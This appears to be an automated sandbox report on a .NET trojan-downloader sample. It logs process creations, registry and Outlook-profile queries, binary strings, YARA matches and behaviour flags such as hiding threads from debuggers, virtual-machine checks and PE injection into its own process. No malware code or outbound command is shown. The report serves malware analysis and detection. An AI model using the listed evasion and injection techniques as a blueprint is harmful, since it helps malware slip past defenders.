                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe:Zone.Identifier
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 2120
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.PDB source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: System.Xml.ni.pdbRSDS source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdbRSDSD source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wmswsock.pdbl source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rasadhlp.pdb" source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ncryptsslp.pdb. source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: nsi.pdbx source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: fwpuclnt.pdbB source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: c.pdbis source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: winhttp.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rtutils.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.271165162.0000000003386000.00000004.00000001.sdmp
                Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: WLDP.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: clrjit.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: rasman.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: crypt32.pdb$ source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: jVisualBasic.pdb source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: version.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: onfiguration.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: wintrust.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: ore.ni.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: System.pdb source: WerFault.exe, 00000008.00000003.283574346.0000000005678000.00000004.00000001.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: ore.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: System.Windows.Forms.pdbl source: WERC8B4.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdbT3?l source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: psapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Configuration.ni.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: dnsapi.pdb0 source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: cldapi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.271182721.0000000003398000.00000004.00000001.sdmp
                Source: Binary string: System.Core.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: rtutils.pdbx source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: cryptbase.pdb` source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: combase.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: System.Core.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: .pdbJ source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297556952.0000000000EF8000.00000004.00000010.sdmp
                Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000008.00000003.283392921.0000000005632000.00000004.00000040.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp, WERC8B4.tmp.dmp.8.dr
                Source: Binary string: edputil.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: crypt32.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.Windows.Forms.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp

                Data Obfuscation:

                Binary contains a suspicious time stamp
                Source: initial sample, Static PE information: 0xCBF103ED [Sat Jun 4 12:07:09 2078 UTC]
                Yara detected aPLib compressed binary
                Source: Yara match, File source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 5804, type: MEMORY
                Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 2576, type: MEMORY
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, Code function: 0_2_00A68B7D pushfd ; iretd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, Code function: 0_2_00A66543 push es; retf
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, Code function: 5_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, Code function: 5_2_00636543 push es; retf
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, Code function: 5_2_00638B7D pushfd ; iretd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, Process information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe TID: 5728 Thread sleep time: -1320000s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe TID: 5728 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmp, WerFault.exe, 00000008.00000002.296625095.00000000053E0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: WerFault.exe, 00000008.00000003.292790829.00000000033A6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW0
                Source: WerFault.exe, 00000008.00000002.295732159.0000000003348000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
                Source: WerFault.exe, 00000008.00000002.296545680.00000000051C7000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmp, WerFault.exe, 00000008.00000002.296625095.00000000053E0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmp, WerFault.exe, 00000008.00000002.296625095.00000000053E0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513547746.0000000000E08000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmp, WerFault.exe, 00000008.00000002.296625095.00000000053E0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Process information queried: ProcessInformation

                Anti Debugging:

                Contains functionality to hide a thread from the debugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Code function: 0_2_0303B8B0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,0303C41F,00000000,00000000
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmp Binary or memory string: Progman
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
